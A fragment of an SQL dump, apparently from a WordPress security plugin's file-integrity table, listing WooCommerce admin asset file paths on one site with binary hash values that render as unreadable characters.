9!S','',0,'?'),('_Im~1tP~G','wp-content/plugins/woocommerce/assets/client/admin/chunks/marketplace.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/marketplace.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h.[mH\'','jZO7cPk:\0T','',0,'?'),('bLp\"Rcu','wp-content/plugins/woocommerce/assets/client/admin/chunks/multichannel-marketing.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/multichannel-marketing.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.ƅ,x2ɻ','Iqѹb\\zYSL46#','',0,'?'),('{88\\m}R8I\'','wp-content/plugins/woocommerce/assets/client/admin/chunks/payment-recommendations.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/payment-recommendations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ַ,1Y','\0fT2Lru?nMqP+\Zװ~nf0','',0,'?'),('\\ M','wp-content/plugins/woocommerce/assets/client/admin/chunks/product-page.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/product-page.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k\0%\"2KgG','EksS8 dͺO','',0,'?'),(',¡KX','wp-content/plugins/woocommerce/assets/client/admin/chunks/profile-wizard.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/profile-wizard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D֬CΠ/cG','\0b1r݀o0jC\nLF-','',0,'?'),('i$<~ə^\0','wp-content/plugins/woocommerce/assets/client/admin/chunks/shipping-recommendations.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/chunks/shipping-recommendations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z_u|2\\','wj\0ŧ48Պ14X~,pŽ','',0,'?'),('.F$u4f\ZT','wp-content/plugins/woocommerce/assets/client/admin/components/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/components/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cF#T*&LGd','OU-v ^i=u[ ݚ`fU','',0,'?'),('7M Oc߀lu','wp-content/plugins/woocommerce/assets/client/admin/components/style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/components/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6E;$!.ƭ\re','mk?,Q ֌ܽFun(\Z/J','',0,'?'),(':0{K/%>!','wp-content/plugins/woocommerce/assets/client/admin/core-profiler/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/core-profiler/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o\"H|za;F-','_+0 * S&85=FCH','',0,'?'),('~< zj=','wp-content/plugins/woocommerce/assets/client/admin/csv-export/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/csv-export/index.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c,(uф`','Nd|AlT?l9+\"!=','',0,'?'),('ID$RB@ {Hhd<','wp-content/plugins/woocommerce/assets/client/admin/csv-export/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/csv-export/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɥlGA*tY','+AoΞpBVxS~_HHLJU','',0,'?'),('(]f\r','wp-content/plugins/woocommerce/assets/client/admin/csv-export/index.js.LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/csv-export/index.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E)a)ᄡ{ .','g3!?#^ -u?˕KG=CW2','',0,'?'),('<%o$,XW','wp-content/plugins/woocommerce/assets/client/admin/currency/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/currency/index.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\0}YE',':%9P\0\\q\\7][H2T<\'','',0,'?'),('avd’&\\','wp-content/plugins/woocommerce/assets/client/admin/currency/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/currency/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V-&h6]z','@[\'Dz/kDhAX\"+a*8','',0,'?'),('3c','wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/index.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɉ,XtSic}','Yw2VI^Cm{e*','',0,'?'),('QS','',0,'?'),('D=K7#N','wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/index.js.LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/index.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R4pa]@V\\','iS&8FgߌX\'J-6hf8km','',0,'?'),('XPA811=Z','wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t(Wj}/bowf','o5`zFISL1]y<\0ܰ aP@','',0,'?'),('Chq9`\0SOM','wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/customer-effort-score/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nM}𤔀$',']*|s ļ!JlCd\0( TCN','',0,'?'),('nZ4LGGU\0','wp-content/plugins/woocommerce/assets/client/admin/customize-store/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/customize-store/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[T`&1vk','fmYe]R{|\')\'?mѭ]A','',0,'?'),('_+MRj )','wp-content/plugins/woocommerce/assets/client/admin/d070003c8575faa9f2fc.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/d070003c8575faa9f2fc.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֔DGb/ S;','%]R.B?&s]ч','',0,'?'),('] o','wp-content/plugins/woocommerce/assets/client/admin/d11c9a0dc859f1236a96.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/d11c9a0dc859f1236a96.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yVdx\\R,ǯjq','㿓mAV4jp~?dFOK','',0,'?'),('61EqqOb ڳ\'];','wp-content/plugins/woocommerce/assets/client/admin/dashboard/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/dashboard/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vnѨz','I?AuQER;+c&nVG','',0,'?'),(': ru','wp-content/plugins/woocommerce/assets/client/admin/dashboard-charts/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/dashboard-charts/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rMM\nUi뫉','?PQN=Kꦯ7f ','',0,'?'),('ǖ&0','wp-content/plugins/woocommerce/assets/client/admin/data/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/data/index.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^yÔ)3','wL9wߴAv*!\r+Q?䂋 ','',0,'?'),('Dl{-F4T','',0,'?'),(':f]] EE%','wp-content/plugins/woocommerce/assets/client/admin/df4b3b75be51b9e11f96.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/df4b3b75be51b9e11f96.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l1#UYB~','CQ3wisܼ DB.H)\' .=','',0,'?'),('XBVJ1/@\'','wp-content/plugins/woocommerce/assets/client/admin/e6774bfd47e76d1fdbb5.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/e6774bfd47e76d1fdbb5.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s+VF%&ץG {','\\ e}\"d@5','',0,'?'),('WcTK$&','wp-content/plugins/woocommerce/assets/client/admin/edit-product-page/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/edit-product-page/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K\\KP -','Ɔw~2E]K:;lb~j','',0,'?'),('Cڲ}~;nܵ','wp-content/plugins/woocommerce/assets/client/admin/experimental/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/experimental/index.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q6.8tKH4',',Z4{ڏC|].وysZ:','',0,'?'),('gV\'l\nkRK','wp-content/plugins/woocommerce/assets/client/admin/experimental/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/experimental/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']u)n=>7jP',' b~}qijna|l(s +','',0,'?'),('lg}>s~','wp-content/plugins/woocommerce/assets/client/admin/experimental/index.js.LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/experimental/index.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5o\r||QG{','\'$,bd12\'dRq ,$g9@','',0,'?'),(' !}藗','wp-content/plugins/woocommerce/assets/client/admin/experimental/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/experimental/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\E_HUUR','L A`b,rl~OnէÀ~M','',0,'?'),('yhý_lk','wp-content/plugins/woocommerce/assets/client/admin/experimental/style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/experimental/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5|VV[YǮ','?{\n^UӞLJ!0','',0,'?'),(' ~$Y6̶\Zs8','wp-content/plugins/woocommerce/assets/client/admin/explat/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/explat/index.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.2VEYzy','\'YM7怤N vgZ\n-','',0,'?'),('ˬA1;u\r1.O','wp-content/plugins/woocommerce/assets/client/admin/explat/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/explat/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^+;ExbL K}','bk%UZ\"~TXǤQhUE','',0,'?'),('<Ȧ_okɵ\\','wp-content/plugins/woocommerce/assets/client/admin/explat/index.js.LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/explat/index.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r3J{P','GO\rwgAdk`~3O1!pe@','',0,'?'),(' \' oN','wp-content/plugins/woocommerce/assets/client/admin/f574e970a917e4dff5ec.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/f574e970a917e4dff5ec.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',1*,','جo\\*lCn ','',0,'?'),(';!,cGʳj','wp-content/plugins/woocommerce/assets/client/admin/homescreen/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/homescreen/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V.gxI M\n_','9ދa<(M1_0x7u\\, P{:','',0,'?'),('T94Н','wp-content/plugins/woocommerce/assets/client/admin/leaderboards/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/leaderboards/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%+eѦaF','8r:aK\\m!K ֖#u^g','',0,'?'),('V}lA̢Š','wp-content/plugins/woocommerce/assets/client/admin/marketing-coupons/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/marketing-coupons/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ԮKf~Q\r','{b,\\*^7@g܌naYuam ','',0,'?'),('携l\0XC}','wp-content/plugins/woocommerce/assets/client/admin/marketing-coupons/style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/marketing-coupons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\R\nRc#','eZOHMSvBb~b','',0,'?'),('|wLZ *HU','wp-content/plugins/woocommerce/assets/client/admin/marketplace/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/marketplace/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','++hsZ','\nDJuvuFbL@PwCD4h','',0,'?'),('D1/3\'v9Ry','wp-content/plugins/woocommerce/assets/client/admin/multichannel-marketing/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/multichannel-marketing/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ngݧ]8','HYbjґU J]t_(','',0,'?'),('g0נѵ/0','wp-content/plugins/woocommerce/assets/client/admin/navigation/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/navigation/index.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','23,i>CVz@','y Ba%Q1zh}:\ZӿKʠ=','',0,'?'),('Ŝׁ5yk','wp-content/plugins/woocommerce/assets/client/admin/navigation/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/navigation/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Be\r`dt1\0','\r3M\Z :1[CSdCK(>Z','',0,'?'),('rE7\\_C ','wp-content/plugins/woocommerce/assets/client/admin/navigation-opt-out/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/navigation-opt-out/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d6t%}AVp','rN]` e\'c{yWbaO1Lc','',0,'?'),('t0əMzq','wp-content/plugins/woocommerce/assets/client/admin/navigation-opt-out/style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/navigation-opt-out/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0?5WS ','\"DiEXFx\'=ι}}4fv4,(#D','',0,'?'),('FjJl*8I]','wp-content/plugins/woocommerce/assets/client/admin/notices/index.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/notices/index.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OLu;F0','k\r:7<|~ :ɓ>','',0,'?'),('ˀg3/5R','wp-content/plugins/woocommerce/assets/client/admin/notices/index.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/notices/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' uLeG:oAHv','\Zc< &6M{0/tO*','wp-content/plugins/woocommerce/assets/client/admin/onboarding/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/onboarding/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yi4<g-mU','k,kI,yYL=\njbb','',0,'?'),('\ZFe :ƕ','wp-content/plugins/woocommerce/assets/client/admin/onboarding/style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/onboarding/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dl\0X*!룹\0','$`9s SmK7qU\Zlq()?S.WS','',0,'?'),('Vez^,lM','wp-content/plugins/woocommerce/assets/client/admin/payment-method-promotions/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/payment-method-promotions/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\" 1 \"o;p','_d/DnJHdױ4\\fP ','',0,'?'),('OPg\r!q\'+','wp-content/plugins/woocommerce/assets/client/admin/payment-method-promotions/style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/payment-method-promotions/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lǷKdhJyR_','?&\'Ky5O| }','',0,'?'),('йyG۴G0','wp-content/plugins/woocommerce/assets/client/admin/print-shipping-label-banner/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/print-shipping-label-banner/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T/RVZ}Ex','hD44$&h}$aύ>2\\','',0,'?'),('% s- !,Ѱ','wp-content/plugins/woocommerce/assets/client/admin/print-shipping-label-banner/style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/print-shipping-label-banner/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' (di)oE{S.','ia(XL`\n;O31KI','',0,'?'),('!&sμQ','wp-content/plugins/woocommerce/assets/client/admin/product-category-metabox/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-category-metabox/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`hwj;hj.E','bE%\\,AJ,䳖7@XM','',0,'?'),('㴪w`6[y','wp-content/plugins/woocommerce/assets/client/admin/product-category-metabox/style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-category-metabox/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S5LI[>TD','r>T76v:ԘYfʦ΄)n)','',0,'?'),('z8/&x{!~','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/attributes/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/attributes/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ld|&Us9[','>[^m޼{4{\'ޣӜ/@p','',0,'?'),(' Dne_U{7ՂyԈ','',0,'?'),('`p/u\Zh2^F','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-attributes-field/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-attributes-field/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rK/\"J6','>[^m޼{4{\'ޣӜ/@p','',0,'?'),('w>r,5Է#','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-attributes-field/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-attributes-field/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Pl@s2q\'','d!w\rƺ\r6\\?','',0,'?'),('A*xdu-!J','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-attributes-field/editor.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-attributes-field/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xXdGu\0\'vU','hY}cW5K+G$ut\'B5)','',0,'?'),('S~aix^#','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-catalog-visibility-field/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-catalog-visibility-field/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WTB4RƘe1\n',':k-ݸ{Vc0Se*3Ɖ','3<,Q/O9D]ˣpW-z&9V','',0,'?'),('Wya3pn','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-has-variations-notice/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-has-variations-notice/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\n1Ujx N','\"cz`%Ҋi\0XTIpT','',0,'?'),('ma|ROb&','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-has-variations-notice/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-has-variations-notice/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Buq\nZUT','o- yf?Ti>ӛI~\r','',0,'?'),('Ir\r:T,8;׻','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-has-variations-notice/editor.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-has-variations-notice/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Buq\nZUT','o- yf?Ti>ӛI~\r','',0,'?'),('>˘<=','',0,'?'),(' E g#\"`MS','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-images-field/editor.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-images-field/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@^enOp=','Q֞x:3/7pק^MUZ','',0,'?'),('MEZIߜY','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-email-field/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-email-field/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WzpB$#\'','@E申_=هb\n2~W E','',0,'?'),('Ay`D(>','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-email-field/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-email-field/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I7=Iړ','HV\"?n7c|lHؕ','',0,'?'),('ٴc,tl5&','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-email-field/editor.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-inventory-email-field/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I7=Iړ','HV\"?n7c|lHؕ','',0,'?'),(' $5 ePφC','',0,'?'),('$a0>l[~!rH','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-name-field/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-name-field/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jdlt\rJM^\'','7y\"}yRԘ\\|J[','',0,'?'),('+|~߂7Y','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-name-field/editor.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-name-field/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wTV8̸','(H/-RH_vR$\'ș㇑\r7/L|p#l','',0,'?'),('$\0\">cn','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-pricing-field/editor.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-pricing-field/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>:$k\"P `.3','EX*GU55RIYF','',0,'?'),('҉,^Lp7ܐ8','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-radio-field/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-radio-field/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RIM|/\0BP','g\Z\"xⷦmHL%q2P','',0,'?'),('2R{>E','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-regular-price-field/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-regular-price-field/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{^@Tw\'','ƍ)A2/6c}$yg','',0,'?'),('ID^Z;{a\0','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-regular-price-field/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-regular-price-field/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HQO`ԅF ','V1S)phtr\Z7o','',0,'?'),('0\rQwW(t+','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-regular-price-field/editor.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-regular-price-field/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XP2}Y*','wX72~/NѮʃ','',0,'?'),('6rZl `jc','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sale-price-field/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sale-price-field/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[BaiLITf','u1 ~ߡƎ_;a+','',0,'?'),(',22Y~k@fˎ','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sale-price-field/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sale-price-field/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8Qz9kyYi','drUnӏDoWӶbgj9~\'','',0,'?'),('2.tY?!54[','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sale-price-field/editor.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-sale-price-field/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s-o>1m:','\nke5V{zlĿ기^ :ԝz\"c K`','',0,'?'),('y齩>.ca7b','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-schedule-sale-fields/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-schedule-sale-fields/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2[whkP','kjzM0<1Bo$պ','',0,'?'),('\'Yɯ}Kq0\Z','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-schedule-sale-fields/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-schedule-sale-fields/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$W~',' y.o^\r;& 썱/l\n ','',0,'?'),('X\n5vuyA\Z','wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-schedule-sale-fields/editor.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/blocks/product-schedule-sale-fields/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$W~',' y.o^\r;& 썱/l\n 